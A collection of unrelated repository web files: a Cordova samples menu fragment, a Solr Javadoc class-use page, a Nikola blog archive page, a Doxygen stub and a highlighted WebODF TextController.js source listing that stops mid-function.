Motion sample</a> <a href="deviceOrientation.html" class="btn">Device Orientation sample</a> <a href="fileSystem.html" class="btn">File System sample</a> <a href="fileTransfer.html" class="btn">File transfer sample</a> <a href="geolocation.html" class="btn">Geolocation sample</a> <a href="globalization.html" class="btn">Globalization sample</a> <a href="inAppBrowser.html" class="btn">In App Browser sample</a> <a href="media.html" class="btn">Media sample</a> <a href="mediaCapture.html" class="btn">Media capture sample</a> <a href="networkInformation.html" class="btn">Network Information sample</a> <a href="splash.html" class="btn">Splash screen sample</a> <a href="vibration.html" class="btn">Vibration sample</a> <a href="statusBar.html" class="btn">Status Bar sample</a> <a href="whitelist.html" class="btn">White List sample</a> </div> <p>Samples collections by Pello Altadill</p> </div> <script type="text/javascript" src="cordova.js"></script> <script type="text/javascript" src="js/globalization.js"></script> </body> </html>
solr-5.0.0/docs/solr-core/org/apache/solr/update/class-use/DocumentBuilder.html
annieweng/solr_example
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="en"> <head> <!-- Generated by javadoc (version 1.7.0_55) on Sun Feb 15 12:26:30 PST 2015 --> <meta http-equiv="Content-Type" content="text/html" charset="utf-8"> <title>Uses of Class org.apache.solr.update.DocumentBuilder (Solr 5.0.0 API)</title> <meta name="date" content="2015-02-15"> <link rel="stylesheet" type="text/css" href="../../../../../stylesheet.css" title="Style"> </head> <body> <script type="text/javascript"><!-- if (location.href.indexOf('is-external=true') == -1) { parent.document.title="Uses of Class org.apache.solr.update.DocumentBuilder (Solr 5.0.0 API)"; } //--> </script> <noscript> <div>JavaScript is disabled on your browser.</div> </noscript> <!-- ========= START OF TOP NAVBAR ======= --> <div class="topNav"><a name="navbar_top"> <!-- --> </a><a href="#skip-navbar_top" title="Skip navigation links"></a><a name="navbar_top_firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../../overview-summary.html">Overview</a></li> <li><a href="../package-summary.html">Package</a></li> <li><a href="../../../../../org/apache/solr/update/DocumentBuilder.html" title="class in org.apache.solr.update">Class</a></li> <li class="navBarCell1Rev">Use</li> <li><a href="../package-tree.html">Tree</a></li> <li><a href="../../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li>Prev</li> <li>Next</li> </ul> <ul class="navList"> <li><a href="../../../../../index.html?org/apache/solr/update/class-use/DocumentBuilder.html" target="_top">Frames</a></li> <li><a href="DocumentBuilder.html" target="_top">No Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_top"> <li><a href="../../../../../allclasses-noframe.html">All Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_top"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <a name="skip-navbar_top"> <!-- --> </a></div> <!-- ========= END OF TOP NAVBAR ========= --> <div class="header"> <h2 title="Uses of Class org.apache.solr.update.DocumentBuilder" class="title">Uses of Class<br>org.apache.solr.update.DocumentBuilder</h2> </div> <div class="classUseContainer">No usage of org.apache.solr.update.DocumentBuilder</div> <!-- ======= START OF BOTTOM NAVBAR ====== --> <div class="bottomNav"><a name="navbar_bottom"> <!-- --> </a><a href="#skip-navbar_bottom" title="Skip navigation links"></a><a name="navbar_bottom_firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../../overview-summary.html">Overview</a></li> <li><a href="../package-summary.html">Package</a></li> <li><a href="../../../../../org/apache/solr/update/DocumentBuilder.html" title="class in org.apache.solr.update">Class</a></li> <li class="navBarCell1Rev">Use</li> <li><a href="../package-tree.html">Tree</a></li> <li><a href="../../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li>Prev</li> <li>Next</li> </ul> <ul class="navList"> <li><a href="../../../../../index.html?org/apache/solr/update/class-use/DocumentBuilder.html" target="_top">Frames</a></li> <li><a href="DocumentBuilder.html" target="_top">No Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_bottom"> <li><a href="../../../../../allclasses-noframe.html">All Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_bottom"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <a name="skip-navbar_bottom"> <!-- --> </a></div> <!-- ======== END OF BOTTOM NAVBAR ======= --> <p class="legalCopy"><small> <i>Copyright &copy; 2000-2015 Apache Software Foundation. All Rights Reserved.</i> <script src='../../../../../prettify.js' type='text/javascript'></script> <script type='text/javascript'> (function(){ var oldonload = window.onload; if (typeof oldonload != 'function') { window.onload = prettyPrint; } else { window.onload = function() { oldonload(); prettyPrint(); } } })(); </script> </small></p> </body> </html>
archive.html
petrizzo/petrizzo.github.io
<!DOCTYPE html> <html prefix="og: http://ogp.me/ns# article: http://ogp.me/ns/article# fb: http://ogp.me/ns/fb# " lang="es"> <head> <meta charset="utf-8"> <meta name="description" content="escritos"> <meta name="viewport" content="width=device-width"> <title>Archivo | Documentar documentando</title> <link href="assets/css/all-nocdn.css" rel="stylesheet" type="text/css"> <link rel="alternate" type="application/rss+xml" title="RSS" href="rss.xml"> <link rel="canonical" href="http://petrizzo.github.io/archive.html"> <meta property="fb:app_id" content=""> <!--[if lt IE 9]><script src="/assets/js/html5.js"></script><![endif]--> <meta name="apple-mobile-web-app-capable" content="yes"> <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent"> <link rel="stylesheet" href="assets/reveal/css/reveal.css"> <!-- If you use another reveal.css, DO NOT forget to delete overflow: hidden from global variables --> <link rel="stylesheet" href="assets/reveal/css/theme/sky.css" id="theme"> <!-- If the query includes 'print-pdf', use the PDF print sheet --> <script> document.write( '<link rel="stylesheet" href="/assets/reveal/css/print/' + ( window.location.search.match( /print-pdf/gi ) ? 'pdf' : 'paper' ) + '.css" type="text/css" media="print">' ); </script> <!--[if lt IE 9]> <script src="/assets/reveal/lib/js/html5shiv.js"></script> <![endif]--> <link rel="stylesheet" href="assets/css/custom_reveal.css"> </head> <body> <!-- Menubar --> <div class="navbar navbar-fixed-top" id="navbar" style="font-family: Open Sans;"> <div class="navbar-inner"> <div class="container"> <!-- .btn-navbar is used as the toggle for collapsed navbar content --> <a class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </a> <a class="brand" href="http://petrizzo.github.io/"> <span id="blog-title">Documentar documentando</span> </a> <!-- Everything you want hidden at 940px or less, place within here --> <div class="nav-collapse collapse"> <ul class="nav"> <li class="active"> <a href="#">Archivo</a> </li> <li> <a href="categories/index.html">Tags</a> </li> <li> <a href="rss.xml">feed RSS</a> </li> </ul> <ul class="nav pull-right"> <li> </ul> </div> </div> </div> </div> <!-- End of Menubar --> <div class="reveal"><div class="slides"> <section> <article class="listpage"> <header> <h1>Archivo</h1> </header> <ul class="postlist"> <li> <a href="2014/index.html">2014</a> </li> </ul> </article> </section> </div></div> <script src="assets/reveal/lib/js/head.min.js"></script> <script src="assets/reveal/js/reveal.min.js"></script> <script> // Full list of configuration options available here: https://github.com/hakimel/reveal.js#configuration Reveal.initialize({ controls: false, progress: false, history: false, keyboard: false, rollingLinks: false, theme: Reveal.getQueryHash().theme, // available themes are in /css/theme transition: Reveal.getQueryHash().transition || 'cube', // default/cube/page/concave/linear/none // Optional libraries used to extend on reveal.js dependencies: [ { src: '/assets/reveal/lib/js/classList.js', condition: function() { return !document.body.classList; } } ] }); </script> <script> Reveal.addEventListener( 'slidechanged', function( event ) { window.scrollTo(0,0); MathJax.Hub.Rerender(event.currentSlide); }); </script> <div class="navbar navbar-fixed-bottom" style="font-family: Open Sans;"> <div class="navbar-inner"> <div class="footerbox"> Contents © 2014 <a href="mailto:petrizzo@gmail.com">Mariangela Petrizzo</a> - Powered by <a href="http://getnikola.com" rel="nofollow">Nikola</a> </div> </div> </div> <script src="assets/js/all-nocdn.js"></script> <script src="assets/js/colorbox-i18n/jquery.colorbox-es.js"></script> <!-- Social buttons --> <div id="addthisbox" class="addthis_toolbox addthis_peekaboo_style addthis_default_style addthis_label_style addthis_32x32_style"> <a class="addthis_button_more">Share</a> <ul> <li> <a class="addthis_button_facebook"></a> </li> <li> <a class="addthis_button_google_plusone_share"></a> </li> <li> <a class="addthis_button_linkedin"></a> </li> <li> <a class="addthis_button_twitter"></a> </li> </ul> </div> <script src="//s7.addthis.com/js/300/addthis_widget.js#pubid=ra-4f7088a56bb93798"></script> <!-- End of social buttons --> <script type="text/javascript">jQuery("a.image-reference").colorbox({rel:"gal",maxWidth:"100%",maxHeight:"100%",scalePhotos:true}); $(window).on('hashchange', function(){ if (location.hash && $(location.hash)[0]) { $('body').animate({scrollTop: $(location.hash).offset().top - $('#navbar').outerHeight(true)*1.2 }, 1); } }); $(document).ready(function(){$(window).trigger('hashchange')}); </script> </body> </html>
doc/web/html/mysql_8inc_8php.html
mjirik/mereni-stromu
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html><head><meta http-equiv="Content-Type" content="text/html;charset=UTF-8"> <title>Webová aplikace k projektu měření objemu řeziva: Dokumentace souboru mysql.inc.php</title> <link href="doxygen.css" rel="stylesheet" type="text/css"> <link href="tabs.css" rel="stylesheet" type="text/css"> </head><body> <!-- Generováno programem Doxygen 1.5.2 --> <div class="tabs"> <ul> <li><a href="index.html"><span>Hlavní&nbsp;stránka</span></a></li> <li><a href="annotated.html"><span>Třídy</span></a></li> <li class="current"><a href="files.html"><span>Soubory</span></a></li> <li><a href="pages.html"><span>Ostatní&nbsp;stránky</span></a></li> </ul> </div> <div class="tabs"> <ul> <li><a href="files.html"><span>Seznam&nbsp;souborů</span></a></li> <li><a href="globals.html"><span>Globální&nbsp;symboly</span></a></li> </ul> </div> <h1>Dokumentace souboru mysql.inc.php</h1><table border="0" cellpadding="0" cellspacing="0"> <tr><td></td></tr> </table> <p align=left>Miroslav Jiřík</p>
js/webodf/webodf.js-0.5.0/docs/symbols/src/lib_gui_TextController.js.html
wunderlins/learning
<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"> <style> .KEYW {color: #933;} .COMM {color: #bbb; font-style: italic;} .NUMB {color: #393;} .STRN {color: #393;} .REGX {color: #339;} .line {border-right: 1px dotted #666; color: #666; font-style: normal;} </style></head><body><pre><span class='line'> 1</span> <span class="COMM">/** <span class='line'> 2</span> * Copyright (C) 2013 KO GmbH &lt;copyright@kogmbh.com> <span class='line'> 3</span> * <span class='line'> 4</span> * @licstart <span class='line'> 5</span> * This file is part of WebODF. <span class='line'> 6</span> * <span class='line'> 7</span> * WebODF is free software: you can redistribute it and/or modify it <span class='line'> 8</span> * under the terms of the GNU Affero General Public License (GNU AGPL) <span class='line'> 9</span> * as published by the Free Software Foundation, either version 3 of <span class='line'> 10</span> * the License, or (at your option) any later version. <span class='line'> 11</span> * <span class='line'> 12</span> * WebODF is distributed in the hope that it will be useful, but <span class='line'> 13</span> * WITHOUT ANY WARRANTY; without even the implied warranty of <span class='line'> 14</span> * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the <span class='line'> 15</span> * GNU Affero General Public License for more details. <span class='line'> 16</span> * <span class='line'> 17</span> * You should have received a copy of the GNU Affero General Public License <span class='line'> 18</span> * along with WebODF. If not, see &lt;http://www.gnu.org/licenses/>. <span class='line'> 19</span> * @licend <span class='line'> 20</span> * <span class='line'> 21</span> * @source: http://www.webodf.org/ <span class='line'> 22</span> * @source: https://github.com/kogmbh/WebODF/ <span class='line'> 23</span> */</span><span class="WHIT"> <span class='line'> 24</span> <span class='line'> 25</span> </span><span class="COMM">/*global core, ops, gui, odf, runtime*/</span><span class="WHIT"> <span class='line'> 26</span> <span class='line'> 27</span> </span><span class="COMM">/** <span class='line'> 28</span> * @constructor <span class='line'> 29</span> * @implements {core.Destroyable} <span class='line'> 30</span> * @param {!ops.Session} session <span class='line'> 31</span> * @param {!gui.SessionConstraints} sessionConstraints <span class='line'> 32</span> * @param {!gui.SessionContext} sessionContext <span class='line'> 33</span> * @param {!string} inputMemberId <span class='line'> 34</span> * @param {function(!number, !number, !boolean):ops.Operation} directStyleOp <span class='line'> 35</span> * @param {function(!number):!Array.&lt;!ops.Operation>} paragraphStyleOps <span class='line'> 36</span> */</span><span class="WHIT"> <span class='line'> 37</span> </span><span class="NAME">gui.TextController</span><span class="WHIT"> </span><span class="PUNC">=</span><span class="WHIT"> </span><span class="KEYW">function</span><span class="WHIT"> </span><span class="NAME">TextController</span><span class="PUNC">(</span><span class="WHIT"> <span class='line'> 38</span> </span><span class="WHIT"> </span><span class="NAME">session</span><span class="PUNC">,</span><span class="WHIT"> <span class='line'> 39</span> </span><span class="WHIT"> </span><span class="NAME">sessionConstraints</span><span class="PUNC">,</span><span class="WHIT"> <span class='line'> 40</span> </span><span class="WHIT"> </span><span class="NAME">sessionContext</span><span class="PUNC">,</span><span class="WHIT"> <span class='line'> 41</span> </span><span class="WHIT"> </span><span class="NAME">inputMemberId</span><span class="PUNC">,</span><span class="WHIT"> <span class='line'> 42</span> </span><span class="WHIT"> </span><span class="NAME">directStyleOp</span><span class="PUNC">,</span><span class="WHIT"> <span class='line'> 43</span> </span><span class="WHIT"> </span><span class="NAME">paragraphStyleOps</span><span class="WHIT"> <span class='line'> 44</span> </span><span class="WHIT"> </span><span class="PUNC">)</span><span class="WHIT"> </span><span class="PUNC">{</span><span class="WHIT"> <span class='line'> 45</span> </span><span class="WHIT"> </span><span class="STRN">"use strict"</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'> 46</span> <span class='line'> 47</span> </span><span class="WHIT"> </span><span class="KEYW">var</span><span class="WHIT"> </span><span class="NAME">odtDocument</span><span class="WHIT"> </span><span class="PUNC">=</span><span class="WHIT"> </span><span class="NAME">session.getOdtDocument</span><span class="PUNC">(</span><span class="PUNC">)</span><span class="PUNC">,</span><span class="WHIT"> <span class='line'> 48</span> </span><span class="WHIT"> </span><span class="NAME">odfUtils</span><span class="WHIT"> </span><span class="PUNC">=</span><span class="WHIT"> </span><span class="KEYW">new</span><span class="WHIT"> </span><span class="NAME">odf.OdfUtils</span><span class="PUNC">(</span><span class="PUNC">)</span><span class="PUNC">,</span><span class="WHIT"> <span class='line'> 49</span> </span><span class="WHIT"> </span><span class="NAME">domUtils</span><span class="WHIT"> </span><span class="PUNC">=</span><span class="WHIT"> </span><span class="KEYW">new</span><span class="WHIT"> </span><span class="NAME">core.DomUtils</span><span class="PUNC">(</span><span class="PUNC">)</span><span class="PUNC">,</span><span class="WHIT"> <span class='line'> 50</span> </span><span class="WHIT"> </span><span class="COMM">/** <span class='line'> 51</span> * @const <span class='line'> 52</span> * @type {!boolean} <span class='line'> 53</span> */</span><span class="WHIT"> <span class='line'> 54</span> </span><span class="WHIT"> </span><span class="NAME">BACKWARD</span><span class="WHIT"> </span><span class="PUNC">=</span><span class="WHIT"> </span><span class="KEYW">false</span><span class="PUNC">,</span><span class="WHIT"> <span class='line'> 55</span> </span><span class="WHIT"> </span><span class="COMM">/** <span class='line'> 56</span> * @const <span class='line'> 57</span> * @type {!boolean} <span class='line'> 58</span> */</span><span class="WHIT"> <span class='line'> 59</span> </span><span class="WHIT"> </span><span class="NAME">FORWARD</span><span class="WHIT"> </span><span class="PUNC">=</span><span class="WHIT"> </span><span class="KEYW">true</span><span class="PUNC">,</span><span class="WHIT"> <span class='line'> 60</span> </span><span class="WHIT"> </span><span class="NAME">isEnabled</span><span class="WHIT"> </span><span class="PUNC">=</span><span class="WHIT"> </span><span class="KEYW">false</span><span class="PUNC">,</span><span class="WHIT"> <span class='line'> 61</span> </span><span class="WHIT"> </span><span class="COMM">/** @const */</span><span class="WHIT"> <span class='line'> 62</span> </span><span class="WHIT"> </span><span class="NAME">textns</span><span class="WHIT"> </span><span class="PUNC">=</span><span class="WHIT"> </span><span class="NAME">odf.Namespaces.textns</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'> 63</span> <span class='line'> 64</span> </span><span class="WHIT"> </span><span class="COMM">/** <span class='line'> 65</span> * @return {undefined} <span class='line'> 66</span> */</span><span class="WHIT"> <span class='line'> 67</span> </span><span class="WHIT"> </span><span class="KEYW">function</span><span class="WHIT"> </span><span class="NAME">updateEnabledState</span><span class="PUNC">(</span><span class="PUNC">)</span><span class="WHIT"> </span><span class="PUNC">{</span><span class="WHIT"> <span class='line'> 68</span> </span><span class="WHIT"> </span><span class="KEYW">if</span><span class="WHIT"> </span><span class="PUNC">(</span><span class="NAME">sessionConstraints.getState</span><span class="PUNC">(</span><span class="NAME">gui.CommonConstraints.EDIT.REVIEW_MODE</span><span class="PUNC">)</span><span class="WHIT"> </span><span class="PUNC">===</span><span class="WHIT"> </span><span class="KEYW">true</span><span class="PUNC">)</span><span class="WHIT"> </span><span class="PUNC">{</span><span class="WHIT"> <span class='line'> 69</span> </span><span class="WHIT"> </span><span class="NAME">isEnabled</span><span class="WHIT"> </span><span class="PUNC">=</span><span class="WHIT"> </span><span class="COMM">/**@type{!boolean}*/</span><span class="PUNC">(</span><span class="NAME">sessionContext.isLocalCursorWithinOwnAnnotation</span><span class="PUNC">(</span><span class="PUNC">)</span><span class="PUNC">)</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'> 70</span> </span><span class="WHIT"> </span><span class="PUNC">}</span><span class="WHIT"> </span><span class="KEYW">else</span><span class="WHIT"> </span><span class="PUNC">{</span><span class="WHIT"> <span class='line'> 71</span> </span><span class="WHIT"> </span><span class="NAME">isEnabled</span><span class="WHIT"> </span><span class="PUNC">=</span><span class="WHIT"> </span><span class="KEYW">true</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'> 72</span> </span><span class="WHIT"> </span><span class="PUNC">}</span><span class="WHIT"> <span class='line'> 73</span> </span><span class="WHIT"> </span><span class="PUNC">}</span><span class="WHIT"> <span class='line'> 74</span> <span class='line'> 75</span> </span><span class="WHIT"> </span><span class="COMM">/** <span class='line'> 76</span> * @param {!ops.OdtCursor} cursor <span class='line'> 77</span> * @return {undefined} <span class='line'> 78</span> */</span><span class="WHIT"> <span class='line'> 79</span> </span><span class="WHIT"> </span><span class="KEYW">function</span><span class="WHIT"> </span><span class="NAME">onCursorEvent</span><span class="PUNC">(</span><span class="NAME">cursor</span><span class="PUNC">)</span><span class="WHIT"> </span><span class="PUNC">{</span><span class="WHIT"> <span class='line'> 80</span> </span><span class="WHIT"> </span><span class="KEYW">if</span><span class="WHIT"> </span><span class="PUNC">(</span><span class="NAME">cursor.getMemberId</span><span class="PUNC">(</span><span class="PUNC">)</span><span class="WHIT"> </span><span class="PUNC">===</span><span class="WHIT"> </span><span class="NAME">inputMemberId</span><span class="PUNC">)</span><span class="WHIT"> </span><span class="PUNC">{</span><span class="WHIT"> <span class='line'> 81</span> </span><span class="WHIT"> </span><span class="NAME">updateEnabledState</span><span class="PUNC">(</span><span class="PUNC">)</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'> 82</span> </span><span class="WHIT"> </span><span class="PUNC">}</span><span class="WHIT"> <span class='line'> 83</span> </span><span class="WHIT"> </span><span class="PUNC">}</span><span class="WHIT"> <span class='line'> 84</span> <span class='line'> 85</span> </span><span class="WHIT"> </span><span class="COMM">/** <span class='line'> 86</span> * @return {!boolean} <span class='line'> 87</span> */</span><span class="WHIT"> <span class='line'> 88</span> </span><span class="WHIT"> </span><span class="NAME">this.isEnabled</span><span class="WHIT"> </span><span class="PUNC">=</span><span class="WHIT"> </span><span class="KEYW">function</span><span class="WHIT"> </span><span class="PUNC">(</span><span class="PUNC">)</span><span class="WHIT"> </span><span class="PUNC">{</span><span class="WHIT"> <span class='line'> 89</span> </span><span class="WHIT"> </span><span class="KEYW">return</span><span class="WHIT"> </span><span class="NAME">isEnabled</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'> 90</span> </span><span class="WHIT"> </span><span class="PUNC">}</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'> 91</span> <span class='line'> 92</span> </span><span class="WHIT"> </span><span class="COMM">/** <span class='line'> 93</span> * Rounds to the first step within the paragraph <span class='line'> 94</span> * @param {!number} step <span class='line'> 95</span> * @return {!boolean} <span class='line'> 96</span> */</span><span class="WHIT"> <span class='line'> 97</span> </span><span class="WHIT"> </span><span class="KEYW">function</span><span class="WHIT"> </span><span class="NAME">roundUp</span><span class="PUNC">(</span><span class="NAME">step</span><span class="PUNC">)</span><span class="WHIT"> </span><span class="PUNC">{</span><span class="WHIT"> <span class='line'> 98</span> </span><span class="WHIT"> </span><span class="KEYW">return</span><span class="WHIT"> </span><span class="NAME">step</span><span class="WHIT"> </span><span class="PUNC">===</span><span class="WHIT"> </span><span class="NAME">ops.OdtStepsTranslator.NEXT_STEP</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'> 99</span> </span><span class="WHIT"> </span><span class="PUNC">}</span><span class="WHIT"> <span class='line'>100</span> <span class='line'>101</span> </span><span class="WHIT"> </span><span class="COMM">/** <span class='line'>102</span> * Return the equivalent cursor range of the specified DOM range. <span class='line'>103</span> * This is found by rounding the range's start and end DOM points to the closest step as defined by the document's <span class='line'>104</span> * position filter (and optionally the root filter as well). <span class='line'>105</span> * <span class='line'>106</span> * @param {!Range} range Range to convert to an equivalent cursor selection <span class='line'>107</span> * @param {!Element} subTree Subtree to limit step searches within. E.g., limit to steps within a certain paragraph. <span class='line'>108</span> * @param {!boolean} withRootFilter Specify true to restrict steps to be within the same root as the range's <span class='line'>109</span> * start container. <span class='line'>110</span> * @return {!{position: !number, length: !number}} <span class='line'>111</span> */</span><span class="WHIT"> <span class='line'>112</span> </span><span class="WHIT"> </span><span class="KEYW">function</span><span class="WHIT"> </span><span class="NAME">domToCursorRange</span><span class="PUNC">(</span><span class="NAME">range</span><span class="PUNC">,</span><span class="WHIT"> </span><span class="NAME">subTree</span><span class="PUNC">,</span><span class="WHIT"> </span><span class="NAME">withRootFilter</span><span class="PUNC">)</span><span class="WHIT"> </span><span class="PUNC">{</span><span class="WHIT"> <span class='line'>113</span> </span><span class="WHIT"> </span><span class="KEYW">var</span><span class="WHIT"> </span><span class="NAME">filters</span><span class="WHIT"> </span><span class="PUNC">=</span><span class="WHIT"> </span><span class="PUNC">[</span><span class="NAME">odtDocument.getPositionFilter</span><span class="PUNC">(</span><span class="PUNC">)</span><span class="PUNC">]</span><span class="PUNC">,</span><span class="WHIT"> <span class='line'>114</span> </span><span class="WHIT"> </span><span class="NAME">startStep</span><span class="PUNC">,</span><span class="WHIT"> <span class='line'>115</span> </span><span class="WHIT"> </span><span class="NAME">endStep</span><span class="PUNC">,</span><span class="WHIT"> <span class='line'>116</span> </span><span class="WHIT"> </span><span class="NAME">stepIterator</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'>117</span> <span class='line'>118</span> </span><span class="WHIT"> </span><span class="KEYW">if</span><span class="WHIT"> </span><span class="PUNC">(</span><span class="NAME">withRootFilter</span><span class="PUNC">)</span><span class="WHIT"> </span><span class="PUNC">{</span><span class="WHIT"> <span class='line'>119</span> </span><span class="WHIT"> </span><span class="NAME">filters.push</span><span class="PUNC">(</span><span class="NAME">odtDocument.createRootFilter</span><span class="PUNC">(</span><span class="COMM">/**@type{!Node}*/</span><span class="PUNC">(</span><span class="NAME">range.startContainer</span><span class="PUNC">)</span><span class="PUNC">)</span><span class="PUNC">)</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'>120</span> </span><span class="WHIT"> </span><span class="PUNC">}</span><span class="WHIT"> <span class='line'>121</span> <span class='line'>122</span> </span><span class="WHIT"> </span><span class="NAME">stepIterator</span><span class="WHIT"> </span><span class="PUNC">=</span><span class="WHIT"> </span><span class="NAME">odtDocument.createStepIterator</span><span class="PUNC">(</span><span class="COMM">/**@type{!Node}*/</span><span class="PUNC">(</span><span class="NAME">range.startContainer</span><span class="PUNC">)</span><span class="PUNC">,</span><span class="WHIT"> </span><span class="NAME">range.startOffset</span><span class="PUNC">,</span><span class="WHIT"> <span class='line'>123</span> </span><span class="WHIT"> </span><span class="NAME">filters</span><span class="PUNC">,</span><span class="WHIT"> </span><span class="NAME">subTree</span><span class="PUNC">)</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'>124</span> </span><span class="WHIT"> </span><span class="KEYW">if</span><span class="WHIT"> </span><span class="PUNC">(</span><span class="PUNC">!</span><span class="NAME">stepIterator.roundToClosestStep</span><span class="PUNC">(</span><span class="PUNC">)</span><span class="PUNC">)</span><span class="WHIT"> </span><span class="PUNC">{</span><span class="WHIT"> <span class='line'>125</span> </span><span class="WHIT"> </span><span class="NAME">runtime.assert</span><span class="PUNC">(</span><span class="KEYW">false</span><span class="PUNC">,</span><span class="WHIT"> </span><span class="STRN">"No walkable step found in paragraph element at range start"</span><span class="PUNC">)</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'>126</span> </span><span class="WHIT"> </span><span class="PUNC">}</span><span class="WHIT"> <span class='line'>127</span> </span><span class="WHIT"> </span><span class="NAME">startStep</span><span class="WHIT"> </span><span class="PUNC">=</span><span class="WHIT"> </span><span class="NAME">odtDocument.convertDomPointToCursorStep</span><span class="PUNC">(</span><span class="NAME">stepIterator.container</span><span class="PUNC">(</span><span class="PUNC">)</span><span class="PUNC">,</span><span class="WHIT"> </span><span class="NAME">stepIterator.offset</span><span class="PUNC">(</span><span class="PUNC">)</span><span class="PUNC">)</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'>128</span> <span class='line'>129</span> </span><span class="WHIT"> </span><span class="KEYW">if</span><span class="WHIT"> </span><span class="PUNC">(</span><span class="NAME">range.collapsed</span><span class="PUNC">)</span><span class="WHIT"> </span><span class="PUNC">{</span><span class="WHIT"> <span class='line'>130</span> </span><span class="WHIT"> </span><span class="NAME">endStep</span><span class="WHIT"> </span><span class="PUNC">=</span><span class="WHIT"> </span><span class="NAME">startStep</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'>131</span> </span><span class="WHIT"> </span><span class="PUNC">}</span><span class="WHIT"> </span><span class="KEYW">else</span><span class="WHIT"> </span><span class="PUNC">{</span><span class="WHIT"> <span class='line'>132</span> </span><span class="WHIT"> </span><span class="NAME">stepIterator.setPosition</span><span class="PUNC">(</span><span class="COMM">/**@type{!Node}*/</span><span class="PUNC">(</span><span class="NAME">range.endContainer</span><span class="PUNC">)</span><span class="PUNC">,</span><span class="WHIT"> </span><span class="NAME">range.endOffset</span><span class="PUNC">)</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'>133</span> </span><span class="WHIT"> </span><span class="KEYW">if</span><span class="WHIT"> </span><span class="PUNC">(</span><span class="PUNC">!</span><span class="NAME">stepIterator.roundToClosestStep</span><span class="PUNC">(</span><span class="PUNC">)</span><span class="PUNC">)</span><span class="WHIT"> </span><span class="PUNC">{</span><span class="WHIT"> <span class='line'>134</span> </span><span class="WHIT"> </span><span class="NAME">runtime.assert</span><span class="PUNC">(</span><span class="KEYW">false</span><span class="PUNC">,</span><span class="WHIT"> </span><span class="STRN">"No walkable step found in paragraph element at range end"</span><span class="PUNC">)</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'>135</span> </span><span class="WHIT"> </span><span class="PUNC">}</span><span class="WHIT"> <span class='line'>136</span> </span><span class="WHIT"> </span><span class="NAME">endStep</span><span class="WHIT"> </span><span class="PUNC">=</span><span class="WHIT"> </span><span class="NAME">odtDocument.convertDomPointToCursorStep</span><span class="PUNC">(</span><span class="NAME">stepIterator.container</span><span class="PUNC">(</span><span class="PUNC">)</span><span class="PUNC">,</span><span class="WHIT"> </span><span class="NAME">stepIterator.offset</span><span class="PUNC">(</span><span class="PUNC">)</span><span class="PUNC">)</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'>137</span> </span><span class="WHIT"> </span><span class="PUNC">}</span><span class="WHIT"> <span class='line'>138</span> </span><span class="WHIT"> </span><span class="KEYW">return</span><span class="WHIT"> </span><span class="PUNC">{</span><span class="WHIT"> <span class='line'>139</span> </span><span class="WHIT"> </span><span class="NAME">position</span><span class="PUNC">:</span><span class="WHIT"> </span><span class="COMM">/**@type{!number}*/</span><span class="PUNC">(</span><span class="NAME">startStep</span><span class="PUNC">)</span><span class="PUNC">,</span><span class="WHIT"> <span class='line'>140</span> </span><span class="WHIT"> </span><span class="NAME">length</span><span class="PUNC">:</span><span class="WHIT"> </span><span class="COMM">/**@type{!number}*/</span><span class="PUNC">(</span><span class="NAME">endStep</span><span class="WHIT"> </span><span class="PUNC">-</span><span class="WHIT"> </span><span class="NAME">startStep</span><span class="PUNC">)</span><span class="WHIT"> <span class='line'>141</span> </span><span class="WHIT"> </span><span class="PUNC">}</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'>142</span> </span><span class="WHIT"> </span><span class="PUNC">}</span><span class="WHIT"> <span class='line'>143</span> <span class='line'>144</span> </span><span class="WHIT"> </span><span class="COMM">/** <span class='line'>145</span> * Creates operations to remove the provided selection and update the destination <span class='line'>146</span> * paragraph's style if necessary. <span class='line'>147</span> * @param {!Range} range <span class='line'>148</span> * @return {!Array.&lt;!ops.Operation>} <span class='line'>149</span> */</span><span class="WHIT"> <span class='line'>150</span> </span><span class="WHIT"> </span><span class="KEYW">function</span><span class="WHIT"> </span><span class="NAME">createRemoveSelectionOps</span><span class="PUNC">(</span><span class="NAME">range</span><span class="PUNC">)</span><span class="WHIT"> </span><span class="PUNC">{</span><span class="WHIT"> <span class='line'>151</span> </span><span class="WHIT"> </span><span class="KEYW">var</span><span class="WHIT"> </span><span class="NAME">firstParagraph</span><span 